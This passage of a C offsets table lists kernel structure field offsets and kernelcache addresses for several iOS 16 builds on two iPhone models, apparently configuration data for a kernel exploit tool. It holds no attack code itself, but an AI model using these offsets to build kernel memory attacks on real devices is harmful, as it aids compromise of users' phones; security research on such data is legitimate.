._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a491208, .kernelcache__gPhysBase = 0xfffffff00792bfc0, .kernelcache__gPhysSize = 0xfffffff00792bfc0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00792a198, .kernelcache__perfmon_devices = 0xfffffff00a4cf520, .kernelcache__perfmon_dev_open = 0xfffffff007ef064c, .kernelcache__ptov_table = 0xfffffff0078df188, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4ce990, .kernelcache__vm_pages = 0xfffffff0078dbeb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078de128, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4ce988, .kernelcache__vn_kqfilter = 0xfffffff007f3f538, }, // iOS 16.4.1 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:59 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8101", .build_version = "20E252", .device_id = "iPhone13,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a491208, .kernelcache__gPhysBase = 0xfffffff00792bfc0, .kernelcache__gPhysSize = 0xfffffff00792bfc0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00792a198, .kernelcache__perfmon_devices = 0xfffffff00a4cf520, .kernelcache__perfmon_dev_open = 0xfffffff007ef064c, .kernelcache__ptov_table = 0xfffffff0078df188, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4ce990, .kernelcache__vm_pages = 0xfffffff0078dbeb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078de128, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4ce988, .kernelcache__vn_kqfilter = 0xfffffff007f3f538, }, // iOS 16.5 // { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:08:42 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8101", .build_version = "20F66", .device_id = "iPhone13,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a49d288, .kernelcache__gPhysBase = 0xfffffff007930100, .kernelcache__gPhysSize = 0xfffffff007930100 + 0x8, .kernelcache__gVirtBase = 0xfffffff00792e2d8, .kernelcache__perfmon_devices = 0xfffffff00a4db520, .kernelcache__perfmon_dev_open = 0xfffffff007ef484c, .kernelcache__ptov_table = 0xfffffff0078e3188, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4da990, .kernelcache__vm_pages = 0xfffffff0078dfeb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e2128, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4da988, .kernelcache__vn_kqfilter = 0xfffffff007f439d0, }, // iOS 16.6 Beta 1 // { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:36 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8101", .build_version = "20G5026e", .device_id = "iPhone13,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x58, .task__threads__prev = 0x60, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x360, .thread__task_threads__prev = 0x368, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x0 + 0x10, //0x8 ._vm_map__hdr__links__next = 0x8 + 0x10, //0x10 ._vm_map__hdr__links__start = 0x10 + 0x10, //0x18 ._vm_map__hdr__links__end = 0x18 + 0x10, //0x20 ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x98, ._vm_map__hole_hint = 0xa0, ._vm_map__holes_list = 0xa8, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a545ab0, .kernelcache__gPhysBase = 0xfffffff0079442a8, .kernelcache__gPhysSize = 0xfffffff0079442b0, //79442B0 .kernelcache__gVirtBase = 0xfffffff007942460, .kernelcache__perfmon_devices = 0xfffffff00a585550, .kernelcache__perfmon_dev_open = 0xfffffff007f1508c, .kernelcache__ptov_table = 0xfffffff0078f79c8, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a584910, .kernelcache__vm_pages = 0xfffffff0078f4108, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078f6968, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a584908, .kernelcache__vn_kqfilter = 0xfffffff007f63be0, }, // End iPhone 12 Mini // // End iPhone 12 Pro, iPhone 12 Pro Max, iPhone 12, iPhone 12 Mini series // // Start iPhone 14, iPhone 14 Plus, iPhone 13 Pro, iPhone 13 Pro Max, iPhone 13, iPhone 13 Mini, iPhone SE 3rd series // // Start iPhone 14 // // iOS 16.2 // { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:56 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8110", .build_version = "20C65", .device_id = "iPhone14,7", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a359190, .kernelcache__gPhysBase = 0xfffffff0078540c8, .kernelcache__gPhysSize = 0xfffffff0078540c8 + 0x8, .kernelcache__gVirtBase = 0xfffffff0078522a8, .kernelcache__perfmon_devices = 0xfffffff00a3943b0, .kernelcache__perfmon_dev_open = 0xfffffff007eccfa8, .kernelcache__ptov_table = 0xfffffff007807370, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a393800, .kernelcache__vm_pages = 0xfffffff007804098, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007806330, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3937f8, .kernelcache__vn_kqfilter = 0xfffffff007f1cfd0, }, // iOS 16.3 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:19 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8110", .build_version = "20D47", .device_id = "iPhone14,7", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a365190, .kernelcache__gPhysBase = 0xfffffff0078541b0, .kernelcache__gPhysSize = 0xfffffff0078541b0 + 0x8, .kernelcache__gVirtBase = 0xfffffff007852390, .kernelcache__perfmon_devices = 0xfffffff00a3a03b0, .kernelcache__perfmon_dev_open = 0xfffffff007ed105c, .kernelcache__ptov_table = 0xfffffff0078073b0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a39f800, .kernelcache__vm_pages = 0xfffffff0078040d8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007806370, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a39f7f8, .kernelcache__vn_kqfilter = 0xfffffff007f21074, }, // iOS 16.3.1 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:19 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8110", .build_version = "20D67", .device_id = "iPhone14,7", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a365190, .kernelcache__gPhysBase = 0xfffffff0078541b0, .kernelcache__gPhysSize = 0xfffffff0078541b0 + 0x8, .kernelcache__gVirtBase = 0xfffffff007852390, .kernelcache__perfmon_devices = 0xfffffff00a3a03b0, .kernelcache__perfmon_dev_open = 0xfffffff007ed105c, .kernelcache__ptov_table = 0xfffffff0078073b0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a39f800, .kernelcache__vm_pages = 0xfffffff0078040d8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007806370, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a39f7f8, .kernelcache__vn_kqfilter = 0xfffffff007f21074, }, // iOS 16.4 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:43:00 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8110", .build_version = "20E247", .device_id = "iPhone14,7", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a441208, .kernelcache__gPhysBase = 0xfffffff007933fc0, .kernelcache__gPhysSize = 0xfffffff007933fc0 + 0x8, .kernelcache__gVirtBase = 0xfffffff007932198, .kernelcache__perfmon_devices = 0xfffffff00a47f520, .kernelcache__perfmon_dev_open = 0xfffffff007eed210, .kernelcache__ptov_table = 0xfffffff0078e7180, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a47e990, .kernelcache__vm_pages = 0xfffffff0078e3ec0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e6130, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a47e988, .kernelcache__vn_kqfilter = 0xfffffff007f39ae0, }, // iOS 16.4.1 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:43:00 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8110", .build_version = "20E252", .device_id = "iPhone14,7", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a441208, .kernelcache__gPhysBase = 0xfffffff007933fc0, .kernelcache__gPhysSize = 0xfffffff007933fc0 + 0x8, .kernelcache__gVirtBase = 0xfffffff007932198, .kernelcache__perfmon_devices = 0xfffffff00a47f520, .kernelcache__perfmon_dev_open = 0xfffffff007eed210, .kernelcache__ptov_table = 0xfffffff0078e7180, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a47e990, .kernelcache__vm_pages = 0xfffffff0078e3ec0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e6130, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a47e988, .kernelcache__vn_kqfilter = 0xfffffff007f39ae0, }, // iOS 16.5 // { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:09:37 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8110", .build_version = "20F66", .device_id = "iPhone14,7", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, 